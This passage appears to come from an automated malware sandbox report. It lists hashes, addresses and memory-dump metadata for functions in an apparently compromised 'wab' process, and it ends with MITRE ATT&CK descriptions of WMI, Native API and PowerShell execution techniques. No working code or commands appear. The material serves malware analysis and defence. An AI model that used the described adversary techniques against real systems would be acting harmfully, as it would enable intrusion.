Opcode Fuzzy Hash: 6d963743b8231cb9f98b44051554814a69ba4c657878bb45d853facc7baeba25
Instruction Fuzzy Hash: 84216DB5D4020AAFDB05DFACD94069EBFF6FF40300F10C9A9C0189B265E7749A59CB82

Function 028B5E98 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b7979b0c40867eabad913b4973dfc0d0b9652b8d5d3d86f2a45556b0cf2d19
Instruction ID: f0fbc7ea121ef3b4e7082de146a5c1dccb3178e21382c1703c8a48a897d3941a
Opcode Fuzzy Hash: b4b7979b0c40867eabad913b4973dfc0d0b9652b8d5d3d86f2a45556b0cf2d19
Instruction Fuzzy Hash: C8012B7EB002456FCB229E58CC506EF3BA7DFC9351B18806AE815CB384CE79CC159B95

Function 0287D54F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3273747481.000000000287D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0287D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_287d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65f5823e5860dd45ab87c05c70a30e3bb3bcd9a98f412a0dadd226b90d9a92a7
Instruction ID: 26478af52d701609429a51a2cd4de9b45a77f7f32bb9d72083d14f426b87ad81
Opcode Fuzzy Hash: 65f5823e5860dd45ab87c05c70a30e3bb3bcd9a98f412a0dadd226b90d9a92a7
Instruction Fuzzy Hash: DC11AC7A504280CFCB16CF14D9C4B16BF62FF88324F24C6A9D9494B656C33AD45ACBA2

Function 0287D19B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3273747481.000000000287D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0287D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_287d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65f5823e5860dd45ab87c05c70a30e3bb3bcd9a98f412a0dadd226b90d9a92a7
Instruction ID: 45ced48510d3c4a429f36afa97bd40953462def40df2cd7a16c4466e8a53c2ad
Opcode Fuzzy Hash: 65f5823e5860dd45ab87c05c70a30e3bb3bcd9a98f412a0dadd226b90d9a92a7
Instruction Fuzzy Hash: BC11E1BA504240CFCB12CF10D5C4B16BF62FF98324F28C5A9D9094B256C336E45ACBA2

Function 028BF4E0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5f1bcec2d23033d369fd8941a7c07f7876f3a2d167b8a9b4410ff566d7fbc45
Instruction ID: 76d3c0033e13faa81fd4e2b751c1fde81d10fb2c2f72c66c4c8cc757530aa615
Opcode Fuzzy Hash: a5f1bcec2d23033d369fd8941a7c07f7876f3a2d167b8a9b4410ff566d7fbc45
Instruction Fuzzy Hash: 43114F75D4010ADFDB05EFACD940A9EBBF6FF44300F10C9A9D1189B265EB749A49CB82

Function 0288D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3273799917.000000000288D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0288D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_288d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d21551876316e45bd0f5c645c1d798fb76669fd7c0fc968ae6a832c02c9a4eed
Instruction ID: 56a9b6a8afaf5402bd5df1b17a533326133cf4cb0d98ce4cf37a2e628bb7f677
Opcode Fuzzy Hash: d21551876316e45bd0f5c645c1d798fb76669fd7c0fc968ae6a832c02c9a4eed
Instruction Fuzzy Hash: 4711BB79504284CFCB12DF20C9C4B15FBA2FB88314F24C6A9D8498B292C33AD44ACB62

Function 2449489B Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b0c5eacd66b99da5e0526e6356777c20c20dbc3f93ecd9d26f58d0ee672b3e
Instruction ID: 957c65d07701e3c0fd63050b77c450bd820d5e24bfef54ee70ce5f065a7aa7ec
Opcode Fuzzy Hash: 08b0c5eacd66b99da5e0526e6356777c20c20dbc3f93ecd9d26f58d0ee672b3e
Instruction Fuzzy Hash: EB118B353086008FDB18DB69D484E0A7BF5FF89321F1584ADD159CB361CB70E804DB51

Function 24493250 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 661d4671eaf906ea1a8ec4fdd965a1fbbd65e4925a14f318464922cd5c3b0f32
Instruction ID: 02049cdf2f620c1974d42cafb2db1e2b74bb8a746a1603a2edbf4857406e32c3
Opcode Fuzzy Hash: 661d4671eaf906ea1a8ec4fdd965a1fbbd65e4925a14f318464922cd5c3b0f32
Instruction Fuzzy Hash: 2301B576A10158EFDF15EF74C844AEE7FB1FF59310F108069E81997281C7748915DBA1

Function 24493260 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6582870d620b451202dd7036bb578c796bdd35986fd5772393a845614080cb
Instruction ID: 802fb665e844ac1b71b624f7be9d3213a0835fadeb83d1177b58524d3c66bb20
Opcode Fuzzy Hash: ba6582870d620b451202dd7036bb578c796bdd35986fd5772393a845614080cb
Instruction Fuzzy Hash: 3F014C35A00619ABCF14EFB9C8489AE7FB5FB99710B004429E91A93380DB389D11DBA1

Function 24494C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 777ea0e47e60e4ae0d895c40e7b1eeb67fe28999d0d62f9ba35825c968cc5f61
Instruction ID: 39a80bfecbccd78865063ec9d868aa1c0c71ffcdc0fd3370eb57fdc1ee7fbfb8
Opcode Fuzzy Hash: 777ea0e47e60e4ae0d895c40e7b1eeb67fe28999d0d62f9ba35825c968cc5f61
Instruction Fuzzy Hash: A301993660C394AFCB031738CC682283FE9EB9B230B1546C6E544C73D2CB3A8802D362

Function 028BABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5df66671bf34e7e27958a889ef2b6560af1c4de81f14afebba165f19c2a3841
Instruction ID: 6ea67daabc4a09d26be0b078f8bcc23ce5d7099f0ca5897abcb16325038c9635
Opcode Fuzzy Hash: d5df66671bf34e7e27958a889ef2b6560af1c4de81f14afebba165f19c2a3841
Instruction Fuzzy Hash: 7EF0963D3406144B972B9A2E9864B6EB6DEEFC8A5A355407DE90DCB361EF31CC038790

Function 24494C58 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1be10fd0ad951b0c661675fe4d38c6edb10c5ce2b5c5753f67b235dc70f4282e
Instruction ID: 1ee06fa4427754e084f2d4fca609abe96037dc6e81031678e34cbabbee4c2c08
Opcode Fuzzy Hash: 1be10fd0ad951b0c661675fe4d38c6edb10c5ce2b5c5753f67b235dc70f4282e
Instruction Fuzzy Hash: CCF028357083546FCF062B78985816D3FDAEBDA221B154196E609C7382CE3A8C02D391

Function 028BF443 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f67f17cc62261ae275e9001e293f3eb856ab6b9ff728f5b65c1e6e9fbc3b4bc
Instruction ID: 52e2054fa2711046ec0afdf878c033b89f882579e9ce5598893fca9d28f69f3a
Opcode Fuzzy Hash: 1f67f17cc62261ae275e9001e293f3eb856ab6b9ff728f5b65c1e6e9fbc3b4bc
Instruction Fuzzy Hash: 57F03C79E11515DFCB95DF78C8045AE77F1BF4971571181A9E649EB720E7309900CB80

Function 24494F10 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49324f57c9b76445828796cbf5afe68ad98fc3d26d90833bb8bce46df42e2783
Instruction ID: 99b32c42ac637f0441963bb1b177ef743d3a84b9f01c0bd94325c1bc8f7ed321
Opcode Fuzzy Hash: 49324f57c9b76445828796cbf5afe68ad98fc3d26d90833bb8bce46df42e2783
Instruction Fuzzy Hash: 74F0A732B085155BDB095A5DF41495EBBE9DFC4671754407EE609C7354CE31DC028790

Function 2449473F Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9edeb618462e05fef0ff807a23f962a478cd9c9e10fa5dd12acae3429a11b822
Instruction ID: adb0dc38e4dfd9ec50b5785bbaf44c6127280d3999c6dc064b9d238b7679c30c
Opcode Fuzzy Hash: 9edeb618462e05fef0ff807a23f962a478cd9c9e10fa5dd12acae3429a11b822
Instruction Fuzzy Hash: ABF0CD76A002089F8B60DFAAD8459EEBFF6FF88350B00422AE905D3211E7305912CBA1

Function 028BF450 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1ccefbcbbdf350afdda235149afaeeac4ca0f10e3ff0dacc6967244a782d56a
Instruction ID: 309f5dcaa00416ddf00345dde50113d7c703511a016738ad2be39d1f91dad306
Opcode Fuzzy Hash: c1ccefbcbbdf350afdda235149afaeeac4ca0f10e3ff0dacc6967244a782d56a
Instruction Fuzzy Hash: B7F01778A101258F8B95EB78C80459E7BF4BF08624B1184A9E609DB320EB3099008B91

Function 24494750 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa37af8e9805381012351dc69ec78710c6088069ab176eb986d96b4cbafa358
Instruction ID: 9a0d6b568ea54b7413f2897af01299d854dcd81e54ca1f6168d0aff5e7a31ad9
Opcode Fuzzy Hash: 9fa37af8e9805381012351dc69ec78710c6088069ab176eb986d96b4cbafa358
Instruction Fuzzy Hash: E4F08276E002089F8B60DFAED84199FFFFAFF88350B40453AD509D3211E63099158BE1

Function 028B28A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f761cb6287335548c64a05ce79eb013a21b12f90f15e59644f25d92839c87d1e
Instruction ID: 3f3a95ea1c31a10b6e5a78812e0674c51278681813ee622c0426a88791f2d07d
Opcode Fuzzy Hash: f761cb6287335548c64a05ce79eb013a21b12f90f15e59644f25d92839c87d1e
Instruction Fuzzy Hash: 14E02636E24766CAC711E7F0EC000EEB734AE86211B48C59BC03837090EB343619C7A2

Function 028B28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43031415e9279eb8db129dc6415786defa3c0461b4b4623e1a94fe2b2c8704dd
Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
Opcode Fuzzy Hash: 43031415e9279eb8db129dc6415786defa3c0461b4b4623e1a94fe2b2c8704dd
Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1

Function 028B8EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 42e884b4ee8b28a2316af929a6c9f28ffd823cfedcd6e0709f9eed0d785b44f9
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: BBC0803B10D1282A9235104E7C44EE3774DC7C13B4A11013BF91CD37005C425C8041F4

Function 028BAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0242a89a1e16d1dbcfe576ef07db154fe913dbdcbd1633673841e0dc1a740ca8
Instruction ID: 6abebb542971134dc202c93b938f07586e4cf7ed0349ad7599058579108fea3a
Opcode Fuzzy Hash: 0242a89a1e16d1dbcfe576ef07db154fe913dbdcbd1633673841e0dc1a740ca8
Instruction Fuzzy Hash: 9ED0677BB40018AFCB14DF9CEC408DDFB76FB98221B148116E915A3261C6319925DB54

Function 028B6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f1dbce2130c5bccc312e3ed65d2985c4a0495f4361cf0507dde7b248786226e
Instruction ID: 39f528b4d50d2767bac956c64d6b37992c6bb14b47101fdafb5096997aaf7e0f
Opcode Fuzzy Hash: 4f1dbce2130c5bccc312e3ed65d2985c4a0495f4361cf0507dde7b248786226e
Instruction Fuzzy Hash: E9C012350843095EC749EB69ED45D2D375FEA802047708930A5060A55DEF7C988D8B93

Non-executed Functions

Function 24490040 Relevance: 1.8, Strings: 1, Instructions: 596COMMON

Download Yara Rule

Strings

.5uq, xrefs: 2449015B

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID: .5uq
API String ID: 0-910421107
Opcode ID: 01e1305c3b8b40173d1b6f416e271c297ab33cc9cb4344b92170da6161d0e64f
Instruction ID: 88f078dc538ee16b5260689e1243b5582365962f953cca919b3032b5ddb9a3fb
Opcode Fuzzy Hash: 01e1305c3b8b40173d1b6f416e271c297ab33cc9cb4344b92170da6161d0e64f
Instruction Fuzzy Hash: B5529A74A01228CFDB64DF69C984B9DBBB2BF89300F1085E9D809A7355DB34AE81DF51

Function 24490B30 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce8893cf5fedac6e6e191e520043abc67df66d36679a09c814091cce41029109
Instruction ID: 19bfbaddfe201a094082f29fe2d4ae1d73238734a7ef7e2aabed756f3671e4ff
Opcode Fuzzy Hash: ce8893cf5fedac6e6e191e520043abc67df66d36679a09c814091cce41029109
Instruction Fuzzy Hash: 0D72BC74E012298FEB65DF69C980BDDBBF2BB49304F2485E9D408A7255DB34AE81CF41

Function 2449E068 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b08021fcee4b3f6ff56356a04df88141eb68b1aebb1c6315be8b5a2a706944d8
Instruction ID: b227d0fddeb1b0f3bcdd485d488ea52cabcc750b11c59c037576e661485cfab9
Opcode Fuzzy Hash: b08021fcee4b3f6ff56356a04df88141eb68b1aebb1c6315be8b5a2a706944d8
Instruction Fuzzy Hash: 43C1A074E01218CFDB54DFA5C944BADBBB2BF89300F2080A9D808AB365DB359E85DF51

Function 2449DC10 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e738ff4f708261b9b62855b82572b4cb839ff99294971c836e558494b9255225
Instruction ID: 4aa40b94d6a7d668743929bc1c9b0d2e05630edf914f338be3386121c06e3695
Opcode Fuzzy Hash: e738ff4f708261b9b62855b82572b4cb839ff99294971c836e558494b9255225
Instruction Fuzzy Hash: 5DC1A174E01218CFDB54DFA5C944BADBBB2BF88300F2081A9D808AB369DB355E85DF51

Function 2449E4C0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c3cf1a8e115660f0a9349af9ccdfbea10095c7db80112fa0d3823868e47e5d4
Instruction ID: 9a451847f09bbfc9f8bfc8a1d6d7fe0391a2c120825333545de43e7b5434ec28
Opcode Fuzzy Hash: 4c3cf1a8e115660f0a9349af9ccdfbea10095c7db80112fa0d3823868e47e5d4
Instruction Fuzzy Hash: BAC1A174E01218CFDB54DFA5C944BADBBB2BF88300F2084A9D808AB365DB359E85DF51

Function 2449ED70 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84b83f5c8e8455ee3922678f69785c656ac690edf54c97b92a3a5c20f1a156dd
Instruction ID: b8af1e254d6b29881b8c14cc8fd038ab888808a1d878bb59b6930bcdb6c721fd
Opcode Fuzzy Hash: 84b83f5c8e8455ee3922678f69785c656ac690edf54c97b92a3a5c20f1a156dd
Instruction Fuzzy Hash: 9DC1A174E01218CFDB54DFA5C944B9DBBB2BF89300F2081A9D809AB369DB359E85CF51

Function 2449E918 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f5a37cdabab1bbcc17b0653c76ea1f6cdb104b94fd760b6dffde2cb535e477
Instruction ID: 346a5efa59a3e9c69c2b2238f89d2eeee8e8c435261571344818ec7b46d88889
Opcode Fuzzy Hash: d3f5a37cdabab1bbcc17b0653c76ea1f6cdb104b94fd760b6dffde2cb535e477
Instruction Fuzzy Hash: E9C1A074E01218CFDB54DFA5C944B9DBBB2BF89300F2084A9D809AB369DB359E85CF51

Function 2449F1C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31fdbe119f844f2e1f4794afc55efe219d6497d1c99aba09a000376a188005ac
Instruction ID: d2372efdbbf9ced67c777f0c42e485ca501f268802a901683579af0d0437ddf6
Opcode Fuzzy Hash: 31fdbe119f844f2e1f4794afc55efe219d6497d1c99aba09a000376a188005ac
Instruction Fuzzy Hash: 48C1A074E01218CFDB54DFA5C944BADBBB2BF88300F2081A9D809AB365DB359E85CF51

Function 2449FA78 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b08a1b10bfc1ee2964844cf733f2c38db5e81861e61906aea80db4b1f700aff
Instruction ID: 80f648c64001e7f71eeae31fd859cd0dea540831256b11ee525c69ed9b8cd5f5
Opcode Fuzzy Hash: 2b08a1b10bfc1ee2964844cf733f2c38db5e81861e61906aea80db4b1f700aff
Instruction Fuzzy Hash: DFC1A074E01218CFDB54DFA5C944B9DBBB2BF88300F2085A9D809AB369DB359E85CF51

Function 2449F620 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b9a586cff6330b12cb3fdbe9b162a43d741186ce00ecfcb55ffd2f3002b7b8
Instruction ID: fdfc1c8c876e6845c86a8eb958b3496dbff3ab3cde53af9c4d711234c33fd4a6
Opcode Fuzzy Hash: f8b9a586cff6330b12cb3fdbe9b162a43d741186ce00ecfcb55ffd2f3002b7b8
Instruction Fuzzy Hash: EAC1AF74E01218CFDB54DFA5C944B9DBBB2BF88300F2085A9D809AB369DB359E85CF51

Function 2449D360 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d083f739048833e1e89a393979701897d0cd41abeb724d0c696bd8e6232eb6f
Instruction ID: 9031904ed0f64f8397f1ae425685fe451e3f4d3cc3b3bfdeb124752472f7b70e
Opcode Fuzzy Hash: 3d083f739048833e1e89a393979701897d0cd41abeb724d0c696bd8e6232eb6f
Instruction Fuzzy Hash: 50C1A174E01218CFDB54DFA5C944B9DBBB2BF88300F2080A9D809AB369DB359E85CF51

Function 2449CF08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a4b7f5f0c6e2d8889871bf7050e359c0be3509f16b035234f78bc1949d124d9
Instruction ID: 114ae105777a65c6964f4ec8783092f2ed2a0ddb6e8b3aeb8fd9bb0fab75468f
Opcode Fuzzy Hash: 1a4b7f5f0c6e2d8889871bf7050e359c0be3509f16b035234f78bc1949d124d9
Instruction Fuzzy Hash: DBC1B074E01218CFDB54DFA5C944B9DBBB2BF89300F2080A9D808AB369DB359E85DF51

Function 2449D7B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9370ff3fcb035c70d5902eeddb0508f9a955f06bcde6018126d8dffc0a1c564
Instruction ID: 72cd0eb20aea0d191da75f3ffbe07bd19a1849f612c4b6f0c197cfed304fee19
Opcode Fuzzy Hash: d9370ff3fcb035c70d5902eeddb0508f9a955f06bcde6018126d8dffc0a1c564
Instruction Fuzzy Hash: D1C19F74E01218CFDB54DFA5C944B9DBBB2BF89300F2084A9D809AB369DB359E85CF51

Function 028B6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 028B6936
\;]q, xrefs: 028B692C
\;]q, xrefs: 028B695E
\;]q, xrefs: 028B6952

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: 247c74308f1a32c659f2e328d0dfdc47c1446f98b6d0f0b9921bc774ab8d7fe0
Instruction ID: 737f11a491d6ee6d5c144b54e82a4d87ebde1afd24d9bb4e730645ecc3524137
Opcode Fuzzy Hash: 247c74308f1a32c659f2e328d0dfdc47c1446f98b6d0f0b9921bc774ab8d7fe0
Instruction Fuzzy Hash: 03019A3D7402298F872D8E2CC580AA537EEAF8CA66725446EE449CB3B4EA21EC41C740

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

